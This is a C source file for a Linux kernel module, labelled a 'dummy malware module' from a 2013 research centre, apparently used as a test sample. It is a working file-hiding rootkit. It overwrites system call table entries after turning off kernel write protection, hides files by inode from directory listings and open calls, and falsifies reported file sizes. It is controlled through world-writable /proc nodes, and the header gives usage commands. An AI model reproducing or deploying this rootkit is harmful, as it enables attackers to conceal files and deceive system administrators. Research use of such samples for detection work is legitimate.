/*
 * Copyright (c) 2013 JST DEOS R&D Center
 */
/*
 * file_rootkit:
 *	dummy malware module to hide or modify size attribute of specified
 *	file.
 *
 * to enable file-rootkit on your kernel, load the module.
 *
 *	$ sudo insmod file_rootkit.ko
 *
 * to hide specified file, write i-node number of the file to /proc/fhide node.
 *
 *	$ echo <i-node number> > /proc/fhide
 *
 * to revive hided file, write i-node number of the file to /proc/fhide node.
 *
 *	$ echo <i-node number> > /proc/fhide
 *
 * to modify file size, write i-node number of the file to /proc/fmodify node.
 *
 *      # add 500 to file size.
 *	$ echo <i-node number> +500 > /proc/fmodify
 *
 *	# decrease 500 to file size.
 *	$ echo <i-node number> -500 > /proc/fmodify
 *
 *	# set 500 to file size.
 *	$ echo <i-node number> 500 > /proc/fmodify
 *
 * to revive file size that modified, write i-node number of the file to
 * /proc/fmodify node.
 *
 *	$ echo <i-node number> > /proc/fmodify
 */

#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/stddef.h>
#include <linux/types.h>
#include <linux/syscalls.h>
#include <linux/sched.h>
#include <linux/list.h>
#include <linux/limits.h>
#include <linux/proc_fs.h>
#include <linux/uaccess.h>
#include <linux/dirent.h>
#include <linux/path.h>
#include <linux/namei.h>


MODULE_LICENSE ("GPL");

/* Systemcall table that has hooking systemcalls. */
void** frtkt_sys_call_table;

enum frtkt_operator {
	FRTKT_NONE	= -1,
	FRTKT_PLUS	=  0,
	FRTKT_MINUS	=  1,
	FRTKT_FIXED	=  2,
};

struct frtkt_ino {
	struct list_head	list;
	ulong			ino;
	ulong			size;
	enum frtkt_operator	ope;
};

struct list_head frtkt_fhide_list;

struct list_head frtkt_fmodify_list;

/* for getdents (not getdents64). */
struct linux_dirent {
	ulong	       d_ino;
	ulong	       d_off;
	ushort	       d_reclen;
	char	       d_name[1];
};


/* Address range of the searching sys_call_table.  Normally, START addr
 * is 0xc0000000. But, DV86 user os starts 0xd0000000. */
//#define FRTKT_SYSCALL_SEARCH_ADDR_START	0xd0000000
#define FRTKT_SYSCALL_SEARCH_ADDR_START	0xc0000000
//#define FRTKT_SYSCALL_SEARCH_ADDR_END	0xe0000000
#define FRTKT_SYSCALL_SEARCH_ADDR_END	0xd0000000

#define FRTKT_PROC_HIDE_IF	"fhide"
#define FRTKT_PROC_SIZE_MOD_IF	"fmodify"


/* The function pointer variables that stores original systemcall in
 * sys_call_table. */
asmlinkage int (*frtkt_orig_sys_open)		(const char*, int, int);
asmlinkage int (*frtkt_orig_sys_close)		(uint);
//asmlinkage int (*frtkt_orig_sys_oldfstat)	(uint,
//						 struct __old_kernel_stat*);
asmlinkage int (*frtkt_orig_sys_fstat)		(uint, struct stat*);
//asmlinkage int (*frtkt_orig_sys_fstat64)	(uint, struct stat64*);
//asmlinkage int (*frtkt_orig_sys_oldlstat)	(const char*,
//						 struct __old_kernel_stat*);
asmlinkage int (*frtkt_orig_sys_lstat)		(const char*, struct stat*);
//asmlinkage int (*frtkt_orig_sys_lstat64)	(const char*, struct stat64*);
asmlinkage int (*frtkt_orig_sys_getdents)	(uint, struct linux_dirent*,
						 uint);
//asmlinkage int (*frtkt_orig_sys_getdents64)	(uint, struct linux_dirent64*,
//						 uint);


static struct frtkt_ino*
frtkt_member (ulong ino, struct list_head* list)
{
	struct frtkt_ino* p;

	list_for_each_entry (p, list, list) {
		if (p->ino == ino) {
			return p;
		}
	}

	return NULL;
}

static bool
frtkt_remove (ulong ino, struct list_head* list)
{
	struct frtkt_ino* p;
	struct frtkt_ino* tmp;

	list_for_each_entry_safe (p, tmp, list, list) {
		if (p->ino == ino) {
			list_del (&p->list);
			kfree (p);
			p = NULL;
			return true;
		}
	}

	return false;
}

static ulong
frtkt_modified_size_get (ulong real_size, ulong size, enum frtkt_operator ope)
{
	ulong mod_size = real_size;

	switch (ope) {
	case FRTKT_PLUS:
		mod_size += size;
		break;
	case FRTKT_MINUS:
		mod_size = (size > real_size) ? 0 : real_size - size;
		break;
	case FRTKT_FIXED:
		mod_size = size;
		break;
	default:
		break;
	}

	return mod_size;
}

asmlinkage int
frtkt_sys_open (const char* file, int flags, int mode)
{
	ulong ino;
	struct path path;

	if (file == NULL || kern_path (file, LOOKUP_FOLLOW, &path) != 0) {
		goto call;
	}

	if (path.dentry == NULL || path.dentry->d_inode == NULL) {
		goto call;
	}
	ino = path.dentry->d_inode->i_ino;

	if (frtkt_member (ino, &frtkt_fhide_list) != NULL) {
		return -ENOENT;
	}

call:
	return frtkt_orig_sys_open (file, flags, mode);
}

asmlinkage int
frtkt_sys_close (uint fd)
{
	int ret;

	if ((ret = frtkt_orig_sys_close (fd)) < 0) {
		return fd;
	}

	return ret;
}

#if 0
asmlinkage int
frtkt_sys_oldfstat (uint fd, struct __old_kernel_stat* statbuf)
{
	int ret;
	struct frtkt_ino* entry;

	if ((ret = frtkt_orig_sys_oldfstat (fd, statbuf)) < 0) {
		return ret;
	}

	/* modify file size. */
	if ((entry = frtkt_member (statbuf->st_ino,
				   &frtkt_fmodify_list)) != NULL) {
		statbuf->st_size =
			(uint) frtkt_modified_size_get (
				(ulong) statbuf->st_size, entry->size,
				entry->ope);
	}

	return ret;
}
#endif

asmlinkage int
frtkt_sys_fstat (uint fd, struct stat* statbuf)
{
	int ret;
	struct frtkt_ino* entry;

	if ((ret = frtkt_orig_sys_fstat (fd, statbuf)) < 0) {
		return ret;
	}

	/* modify file size. */
	if ((entry = frtkt_member (statbuf->st_ino,
				   &frtkt_fmodify_list)) != NULL) {
		statbuf->st_size = frtkt_modified_size_get (statbuf->st_size,
							    entry->size,
							    entry->ope);
	}

	return ret;
}

#if 0
asmlinkage int
frtkt_sys_fstat64 (uint fd, struct stat64* statbuf)
{
	int ret;
	struct frtkt_ino* entry;

	if ((ret = frtkt_orig_sys_fstat64 (fd, statbuf)) < 0) {
		return ret;
	}

	/* modify file size. */
	if ((entry = frtkt_member (statbuf->__st_ino,
				   &frtkt_fmodify_list)) != NULL) {
		statbuf->st_size = frtkt_modified_size_get (statbuf->st_size,
							    entry->size,
							    entry->ope);
	}

	return ret;
}
#endif

#if 0
asmlinkage int
frtkt_sys_oldlstat (const char* filename, struct __old_kernel_stat* statbuf)
{
	int ret;
	struct frtkt_ino* entry;

	if ((ret = frtkt_orig_sys_oldlstat (filename, statbuf)) < 0) {
		return ret;
	}

	/* hide file. */
	if ((entry = frtkt_member (statbuf->st_ino,
				   &frtkt_fhide_list)) != NULL) {
		memset (statbuf, 0, sizeof (struct __old_kernel_stat));
		return -ENOENT;
	}

	/* modify file size. */
	if ((entry = frtkt_member (statbuf->st_ino,
				   &frtkt_fmodify_list)) != NULL) {
		statbuf->st_size =
			(uint) frtkt_modified_size_get (
				(ulong) statbuf->st_size,
				entry->size, entry->ope);
	}

	return ret;
}
#endif

asmlinkage int
frtkt_sys_lstat (const char* filename, struct stat* statbuf)
{
	int ret;
	struct frtkt_ino* entry;

	if ((ret = frtkt_orig_sys_lstat (filename, statbuf)) < 0) {
		return ret;
	}

	/* hide file. */
	if ((entry = frtkt_member (statbuf->st_ino,
				   &frtkt_fhide_list)) != NULL) {
		memset (statbuf, 0, sizeof (struct __old_kernel_stat));
		return -ENOENT;
	}

	/* modify file size. */
	if ((entry = frtkt_member (statbuf->st_ino,
				   &frtkt_fmodify_list)) != NULL) {
		statbuf->st_size = frtkt_modified_size_get (statbuf->st_size,
							    entry->size,
							    entry->ope);
	}

	return ret;
}

#if 0
asmlinkage int
frtkt_sys_lstat64 (const char* filename, struct stat64* statbuf)
{
	int ret;
	struct frtkt_ino* entry;

	if ((ret = frtkt_orig_sys_lstat64 (filename, statbuf)) < 0) {
		return ret;
	}

	/* hide file. */
	if ((entry = frtkt_member (statbuf->__st_ino,
				   &frtkt_fhide_list)) != NULL) {
		memset (statbuf, 0, sizeof (struct stat64));
		return -ENOENT;
	}

	/* modify file size. */
	if ((entry = frtkt_member (statbuf->__st_ino,
				   &frtkt_fmodify_list)) != NULL) {
		statbuf->st_size = frtkt_modified_size_get (statbuf->st_size,
							    entry->size,
							    entry->ope);
	}

	return ret;
}
#endif

asmlinkage int
frtkt_sys_getdents (uint fd, struct linux_dirent* dirent, uint count)
{
	int ret, len;
	u_char *p, *dest, *cpy;
	struct linux_dirent*	dp;

	if ((ret = frtkt_orig_sys_getdents (fd, dirent, count)) < 0) {
		return ret;
	}

	len = ret;
	p   = (u_char*) dirent;
	if ((dest = kzalloc (len, GFP_KERNEL)) == NULL) {
		return -ENOMEM;
	}
	cpy = dest;

	while (len > 0) {
		dp = (struct linux_dirent*) p;
		/* hide file */
		if (frtkt_member (dp->d_ino, &frtkt_fhide_list) == NULL) {
			memcpy (dest, p, dp->d_reclen);
			dest += dp->d_reclen;
		}
		len -= dp->d_reclen;
		p   += dp->d_reclen;
	}

	len = dest - cpy;
	memcpy (dirent, cpy, len);
	kfree (cpy);

	return len;
}

#if 0
asmlinkage int
frtkt_sys_getdents64 (uint fd, struct linux_dirent64* dirent, uint count)
{
	int ret, len;
	u_char *p, *dest, *cpy;
	struct linux_dirent64*	dp;

	if ((ret = frtkt_orig_sys_getdents64 (fd, dirent, count)) < 0) {
		return ret;
	}

	len = ret;
	p   = (u_char*) dirent;
	if ((dest = kzalloc (len, GFP_KERNEL)) == NULL) {
		return -ENOMEM;
	}
	cpy = dest;

	while (len > 0) {
		dp = (struct linux_dirent64*) p;
		/* hide file */
		if (frtkt_member (dp->d_ino, &frtkt_fhide_list) == NULL) {
			memcpy (dest, p, dp->d_reclen);
			dest += dp->d_reclen;
		}
		len -= dp->d_reclen;
		p   += dp->d_reclen;
	}

	len = dest - cpy;
	memcpy (dirent, cpy, len);
	kfree (cpy);

	return len;
}
#endif

static void
frtkt_sys_call_table_hook (void** table)
{
	/* save original systemcalls */
	frtkt_orig_sys_open	  = frtkt_sys_call_table[__NR_open];
	frtkt_orig_sys_close	  = frtkt_sys_call_table[__NR_close];
//	frtkt_orig_sys_oldfstat	  = frtkt_sys_call_table[__NR_oldfstat];
	frtkt_orig_sys_fstat	  = frtkt_sys_call_table[__NR_fstat];
//	frtkt_orig_sys_fstat64	  = frtkt_sys_call_table[__NR_fstat64];
//	frtkt_orig_sys_oldlstat	  = frtkt_sys_call_table[__NR_oldlstat];
	frtkt_orig_sys_lstat	  = frtkt_sys_call_table[__NR_lstat];
//	frtkt_orig_sys_lstat64	  = frtkt_sys_call_table[__NR_lstat64];
	frtkt_orig_sys_getdents	  = frtkt_sys_call_table[__NR_getdents];
//	frtkt_orig_sys_getdents64 = frtkt_sys_call_table[__NR_getdents64];

	/* replace systemcall to hooking one. */
	frtkt_sys_call_table[__NR_open]	      = frtkt_sys_open;
	frtkt_sys_call_table[__NR_close]      = frtkt_sys_close;
//	frtkt_sys_call_table[__NR_oldfstat]   = frtkt_sys_oldfstat;
	frtkt_sys_call_table[__NR_fstat]      = frtkt_sys_fstat;
//	frtkt_sys_call_table[__NR_fstat64]    = frtkt_sys_fstat64;
//	frtkt_sys_call_table[__NR_oldlstat]   = frtkt_sys_oldlstat;
	frtkt_sys_call_table[__NR_lstat]      = frtkt_sys_lstat;
//	frtkt_sys_call_table[__NR_lstat64]    = frtkt_sys_lstat64;
	frtkt_sys_call_table[__NR_getdents]   = frtkt_sys_getdents;
//	frtkt_sys_call_table[__NR_getdents64] = frtkt_sys_getdents64;
}

static void
frtkt_sys_call_table_unhook (void** table)
{
	/* replace systemcall to original one. */
	frtkt_sys_call_table[__NR_open]	      = frtkt_orig_sys_open;
	frtkt_sys_call_table[__NR_close]      = frtkt_orig_sys_close;
//	frtkt_sys_call_table[__NR_oldfstat]   = frtkt_orig_sys_oldfstat;
	frtkt_sys_call_table[__NR_fstat]      = frtkt_orig_sys_fstat;
//	frtkt_sys_call_table[__NR_fstat64]    = frtkt_orig_sys_fstat64;
//	frtkt_sys_call_table[__NR_oldlstat]   = frtkt_orig_sys_oldlstat;
	frtkt_sys_call_table[__NR_lstat]      = frtkt_orig_sys_lstat;
//	frtkt_sys_call_table[__NR_lstat64]    = frtkt_orig_sys_lstat64;
	frtkt_sys_call_table[__NR_getdents]   = frtkt_orig_sys_getdents;
//	frtkt_sys_call_table[__NR_getdents64] = frtkt_orig_sys_getdents64;
}

static ulong**
frtkt_sys_call_table_find (void)
{
	ulong** table = NULL;
	ulong	addr;

	for (addr = (ulong) FRTKT_SYSCALL_SEARCH_ADDR_START;
	     addr < (ulong) FRTKT_SYSCALL_SEARCH_ADDR_END;
	     addr += sizeof (void*)) {
		ulong* p = (ulong*) addr;

		if (p[__NR_close] == (ulong) sys_close) {
			table = (ulong**) p;
			return &table[0];
		}
	}

	return NULL;
}

static int
frtkt_proc_hide_read (char* page, char** start, off_t offset, int count,
		      int* eof, void* data )
{
	int n = 0;
	struct frtkt_ino* p;

	n = sprintf (&page[n], "File hided inode numbers:\n");
	list_for_each_entry (p, &frtkt_fhide_list, list) {
		n += sprintf (&page[n], "\t%ld\n", p->ino);
	}

	return n;
}

static int
frtkt_proc_hide_write (struct file* filp, const char* buf, ulong count,
		       void* data)
{
	char buffer[PROC_NUMBUF];
	ulong			ino;
	struct frtkt_ino*       entry;

	memset (buffer, 0, sizeof  (buffer));
	if (count > sizeof (buffer) - 1) {
		count = sizeof (buffer) - 1;
	}

	if (copy_from_user (buffer, buf, count)) {
		return -EFAULT;
	}
	ino = simple_strtol (buffer, NULL, 10);

	/* check whether or not A specified file (inode nubmer) already
	 * hided. */
	if (frtkt_member (ino, &frtkt_fhide_list) != NULL) {
		/* Already hided.
		 * revive file that have specieid inode number. */
		if (frtkt_remove (ino, &frtkt_fhide_list) == false) {
			printk (KERN_WARNING "E: file %ld revival failed.\n",
				ino);
		}

		return count;
	}

	if ((entry = kzalloc (sizeof (struct frtkt_ino),
			      GFP_KERNEL)) == NULL) {
		return -ENOMEM;
	}
	entry->ino  = ino;
	entry->size = 0;
	entry->ope  = FRTKT_NONE;
	list_add_tail (&entry->list, &frtkt_fhide_list);

	return count;
}

static int
frtkt_proc_fmodify_read (char* page, char** start, off_t offset, int count,
			 int* eof, void* data )
{
	int n = 0;
	struct frtkt_ino* p;

	n = sprintf (&page[n], "File size modified inode numbers:\n");
	list_for_each_entry (p, &frtkt_fmodify_list, list) {
		n += sprintf (&page[n], "\tino %ld size %ld ope %d\n",
			      p->ino, p->size, p->ope);
	}

	return n;
}

static int
frtkt_proc_fmodify_write (struct file* filp, const char* buf, ulong count,
			  void* data)
{
	char buffer[128];
	ulong			ino;
	ulong			size = 0;
	struct frtkt_ino*       entry;
	enum frtkt_operator     operator = FRTKT_NONE;

	memset (buffer, 0, sizeof  (buffer));
	if (count > sizeof (buffer) - 1) {
		count = sizeof (buffer) - 1;
	}

	if (copy_from_user (buffer, buf, count)) {
		return -EFAULT;
	}

	if (sscanf (buffer, "%lu +%lu", &ino, &size) == 2) {
		operator = FRTKT_PLUS;
	} else if (sscanf (buffer, "%lu -%lu", &ino, &size) == 2) {
		operator = FRTKT_MINUS;
	} else if (sscanf (buffer, "%lu %lu",  &ino, &size) == 2) {
		operator = FRTKT_FIXED;
	} else if (sscanf (buffer, "%lu", &ino) == 1) {
		operator = FRTKT_NONE;
	} else {
		return count;
	}

	/* check whether or not specified file (inode nubmer)'s file
	 * size already modified. */
	if ((entry = frtkt_member (ino, &frtkt_fmodify_list)) != NULL) {
		if (operator == FRTKT_NONE) {
			/* Already modified.
			 * revive file size of the file that have
			 * specieid inode number. */
			if (frtkt_remove (ino, &frtkt_fmodify_list) == false) {
				printk (KERN_WARNING
					"E: file size of the file %ld "
					"revival failed.",
					ino);
			}
		} else {
			entry->size = size;
			entry->ope  = operator;
		}

		return count;
	}

	if (operator == FRTKT_NONE) {
		return count;
	}

	if ((entry = kzalloc (sizeof (struct frtkt_ino),
			      GFP_KERNEL)) == NULL) {
		return -ENOMEM;
	}
	entry->ino  = ino;
	entry->size = size;
	entry->ope  = operator;
	list_add_tail (&entry->list, &frtkt_fmodify_list);

	return count;
}

static int __init
frtkt_init (void)
{
	struct proc_dir_entry *ent1, *ent2;

	INIT_LIST_HEAD (&frtkt_fhide_list);
	INIT_LIST_HEAD (&frtkt_fmodify_list);

	frtkt_sys_call_table = NULL;
//	if ((frtkt_sys_call_table = (void**) frtkt_sys_call_table_find ())
//	    == NULL) {
//		return -EPERM;
//	}
	frtkt_sys_call_table = 0xffffffff81601320UL;

	/* change sys_call_table to writable. */
	write_cr0 (read_cr0 () & (~ 0x10000));
	/* Hook certain systemcalls. */
	frtkt_sys_call_table_hook (frtkt_sys_call_table);
	/* change sys_call_table to readonly. */
	write_cr0 (read_cr0 () | 0x10000);

	if ((ent1 = create_proc_entry (FRTKT_PROC_HIDE_IF,
				       S_IFREG | S_IRUGO | S_IWUGO,
				       NULL)) == NULL) {
		printk ("create_proc_entry failed\n");
		return -EBUSY;
	}
	ent1->read_proc  = frtkt_proc_hide_read;
	ent1->write_proc = frtkt_proc_hide_write;

	if ((ent2 = create_proc_entry (FRTKT_PROC_SIZE_MOD_IF,
				       S_IFREG | S_IRUGO | S_IWUGO,
				       NULL)) == NULL) {
		printk ("create_proc_entry failed\n");
		return -EBUSY;
	}
	ent2->read_proc  = frtkt_proc_fmodify_read;
	ent2->write_proc = frtkt_proc_fmodify_write;

	return 0;
}

static void __exit
frtkt_exit (void)
{
	struct frtkt_ino* p;
	struct frtkt_ino* tmp;

	if (frtkt_sys_call_table != NULL) {
		/* change sys_call_table to writable. */
		write_cr0 (read_cr0 () & (~ 0x10000));
		/* UnHook hooked systemcalls. */
		frtkt_sys_call_table_unhook (frtkt_sys_call_table);
		/* change sys_call_table to readonly. */
		write_cr0 (read_cr0 () | 0x10000);

		remove_proc_entry (FRTKT_PROC_HIDE_IF,  NULL);
		remove_proc_entry (FRTKT_PROC_SIZE_MOD_IF, NULL);

		list_for_each_entry_safe (p, tmp, &frtkt_fhide_list, list) {
			list_del (&p->list);
			kfree (p);
		}

		list_for_each_entry_safe (p, tmp, &frtkt_fmodify_list, list) {
			list_del (&p->list);
			kfree (p);
		}
	}
}

module_init (frtkt_init);
module_exit (frtkt_exit);

/* file_rootkit.c ends here */
